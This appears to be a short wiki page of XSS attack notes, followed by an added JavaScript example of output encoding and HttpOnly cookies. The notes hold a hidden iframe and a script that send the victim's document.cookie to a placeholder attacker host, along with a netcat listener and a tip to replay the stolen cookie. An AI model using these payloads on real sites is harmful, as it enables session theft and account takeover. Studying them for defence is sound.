Web_XSS
lethanhtung01011980 edited this page Dec 11, 2019 · 5 revisions
- XSS attacks user input that is not validated: scripts are entered into user input fields.
- Local XSS:
<script>Hi</script>
- Browser redirection:
<iframe SRC="http://Attacker_IP/report" height = "0" width ="0"></iframe>
To listen for the remote connection from the browser redirection:
- On the attacker machine,
nc -nlvp 80
There is no need to have a bogus.php page:
nc -nlvp 80
<script>new Image().src="http://Attacker_ip/bogus.php?output="+document.cookie;</script>
- Use Cookies Manager+ to open the victim website with the stolen cookie.
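
A defender's view of the payloads above, as an added example that is not part of the original wiki page: the same inputs rendered with and without HTML output encoding, and a session cookie set with `HttpOnly` so that `document.cookie` does not expose it. All function names are hypothetical, and the cookie visibility function is a simplified model of browser behaviour.

```javascript
// Added example: vulnerable rendering beside its hardened form.
// Characters that let text break out of HTML element or attribute context.
const HTML_ESCAPES = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: user input is concatenated into markup unchanged.
function renderCommentUnsafe(comment) {
  return '<div class="comment">' + comment + '</div>';
}

// Hardened: user input is encoded for the HTML context before output.
function renderCommentSafe(comment) {
  return '<div class="comment">' + escapeHtml(comment) + '</div>';
}

// Session cookie header: HttpOnly keeps the cookie out of document.cookie,
// Secure restricts it to HTTPS, SameSite limits cross-site sending.
function sessionCookieHeader(name, value) {
  return `${name}=${encodeURIComponent(value)}; Path=/; HttpOnly; Secure; SameSite=Lax`;
}

// Simplified model of what document.cookie returns to page scripts:
// cookies flagged HttpOnly are omitted.
function scriptVisibleCookies(setCookieHeaders) {
  return setCookieHeaders
    .filter((h) => !/;\s*HttpOnly\b/i.test(h))
    .map((h) => h.split(';')[0])
    .join('; ');
}

// Inputs taken from the payload list on this page.
const samples = [
  '<script>Hi</script>',
  '<iframe SRC="http://Attacker_IP/report" height = "0" width ="0"></iframe>',
];
for (const s of samples) {
  console.log('unsafe:', renderCommentUnsafe(s));
  console.log('safe:  ', renderCommentSafe(s));
}

// Constructed sample cookies: only the non-HttpOnly one is script-visible.
const headers = ['theme=dark; Path=/', sessionCookieHeader('session', 'abc')];
console.log('document.cookie would show:', scriptVisibleCookies(headers));
```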